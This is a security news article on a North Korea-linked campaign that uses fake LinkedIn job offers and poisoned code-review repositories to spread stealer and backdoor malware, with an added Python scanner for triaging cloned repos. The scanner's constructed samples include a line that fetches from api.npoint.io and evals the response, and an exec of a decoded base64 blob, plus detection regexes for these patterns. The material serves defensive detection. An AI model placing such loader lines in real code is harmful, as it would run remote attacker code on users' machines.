The Lazarus Group, a North Korea-linked cybercriminal organization, has been identified in an ongoing scheme that utilizes fake job offers on LinkedIn in the cryptocurrency and travel industries to distribute malware capable of infecting Windows, macOS, and Linux systems.
Bitdefender, a cybersecurity firm, revealed that the attack begins with a message on LinkedIn, enticing recipients with the prospect of remote work, flexible hours, and competitive pay.
“Upon expressing interest, the scam progresses with the scammer requesting a CV or a personal GitHub repository link,” stated Bitdefender in a report shared with The Hacker News.
“Although seemingly harmless, these requests can be used for malicious purposes, such as harvesting personal data or adding a veneer of legitimacy to the interaction.”
After gathering the requested information, the attacker, posing as a recruiter, sends a link to a GitHub or Bitbucket repository containing a prototype of a decentralized exchange (DEX) project and instructs the target to review it and provide feedback.
Embedded within the code is a hidden script designed to fetch a subsequent payload from api.npoint.io, a JavaScript information stealer capable of extracting data from various cryptocurrency wallet extensions installed on the victim’s browser.
The stealer also functions as a loader to retrieve a Python-based backdoor that can monitor clipboard changes, establish persistent remote access, and deploy additional malware.
The tactics outlined by Bitdefender align with a known attack cluster tracked as Contagious Interview, which deploys a JavaScript stealer named BeaverTail and a Python implant known as InvisibleFerret.
“The analyzed malware appears to be part of the Contagious Interview cluster,” commented Bitdefender Labs to The Hacker News. “However, the JavaScript sample differs from previous BeaverTail variants. We have observed additional elements in the infection chain, indicating that threat actors are continuously adjusting and enhancing their strategies.”
The Python-based malware is a .NET binary that can download and initiate a TOR proxy server to communicate with a command-and-control (C2) server, extract basic system details, and distribute another payload capable of stealing sensitive information, logging keystrokes, and launching a cryptocurrency mining operation.
“The attackers’ infection chain is intricate, involving malicious software written in multiple languages and utilizing various technologies, such as multi-layered Python scripts that recursively decode and execute themselves, a JavaScript stealer that initially gathers browser data before progressing to additional payloads, and .NET-based stages that can disable security tools, set up a Tor proxy, and launch crypto miners,” detailed Bitdefender.
Reports on LinkedIn and Reddit suggest that these attacks are widespread, with slight variations in the overall modus operandi. Some instances involve candidates cloning a Web3 repository for local execution as part of an interview process, while others require fixing intentionally introduced bugs in the code.
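A pre-execution triage pass a candidate (or a blue team) can run over a cloned "review this repo" project before anything is executed. This is an added example, not Bitdefender's tooling or the campaign's code; the only indicator taken from the report is the api.npoint.io staging host, and the other heuristics (eval of network data, decode-then-exec chains, long opaque literals) are assumed from the chain described above. The sample files are constructed.

```python
import re
from typing import Dict, List, Tuple

# Heuristics tied to the chain described above: a script hidden in the "please
# review this DEX prototype" repo fetches a stage from api.npoint.io, and later
# stages are layered scripts that decode and execute themselves. Each check is
# a list of regexes that must ALL match on the same line.
CHECKS: List[Tuple[str, List[str]]] = [
    ("staging_host", [r"api\.npoint\.io"]),
    ("js_eval_of_network_data",
     [r"\beval\s*\(", r"\b(?:fetch|axios|https?\.get|request)\b"]),
    ("py_exec_of_decoded_blob",
     [r"\b(?:exec|eval)\s*\(", r"\b(?:b64decode|decode|decompress)\b"]),
    # a 200+ char base64-looking literal is typical of an embedded encoded stage
    ("long_opaque_literal", [r"['\"][A-Za-z0-9+/=]{200,}['\"]"]),
]
COMPILED = [(name, [re.compile(p) for p in pats]) for name, pats in CHECKS]


def scan_source(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, check_name) for every line that trips a heuristic."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pats in COMPILED:
            if all(p.search(line) for p in pats):
                hits.append((lineno, name))
    return hits


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Scan a {path: source} mapping; only files with findings are returned."""
    return {path: hits for path, src in files.items() if (hits := scan_source(src))}


# Constructed sample repo (not the campaign's real code): a loader buried in a
# config module, a layered Python stage, and one clean file for comparison.
# The npoint URL path is a placeholder, not a real indicator.
SAMPLE_FILES = {
    "src/config/tokens.js": (
        "export const FEE_BPS = 30;\n"
        "const u = 'https://api.npoint.io/PLACEHOLDER-ID';\n"
        "axios.get(u).then(r => eval(r.data));\n"
    ),
    "scripts/update.py": "import base64, zlib\nexec(zlib.decompress(base64.b64decode(BLOB)))\n",
    "src/utils/format.js": "export const fmt = (n) => n.toFixed(2);\n",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        for lineno, name in hits:
            print(f"{path}:{lineno}: {name}")
```

Any hit is a reason to review the flagged lines (and the repository's install hooks) before running `npm install` or the project itself.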
One of the Bitbucket repositories associated with the campaign is named “miketoken_v2,” which is no longer accessible on the platform. Bitdefender noted that this activity is part of the same campaign, with repository names and recruiter profiles shuffled.
This disclosure follows SentinelOne’s revelation that the Contagious Interview campaign is distributing another malware strain named FlexibleFerret.